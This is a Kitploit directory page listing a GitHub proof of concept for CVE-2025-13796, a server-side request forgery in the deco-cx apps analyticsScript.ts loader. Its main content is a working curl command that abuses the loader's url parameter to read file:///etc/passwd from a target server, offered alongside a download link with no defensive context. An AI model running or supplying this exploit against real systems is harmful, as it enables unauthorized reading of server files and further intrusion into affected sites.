Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-13796-PoC — deco-cx apps Parameter analyticsScript.ts AnalyticsScript server-side request forgery | Kitploit
Tools/GitHubGitHub/0xcucumbersalad/cve-2025-13796-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHub0xcucumbersalad/cve-2025-13796-poc

CVE-2025-13796-PoC

deco-cx apps Parameter analyticsScript.ts AnalyticsScript server-side request forgery

View Repository
9 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-13796-PoC

deco-cx apps Parameter analyticsScript.ts AnalyticsScript server-side request forgery

PoC:

root@kitploit:~
curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: x.x.x.x' \
    $'http://x.x.x.x/live/invoke/website/loaders/analyticsScript.ts?url=file:///etc/passwd'
Download Tool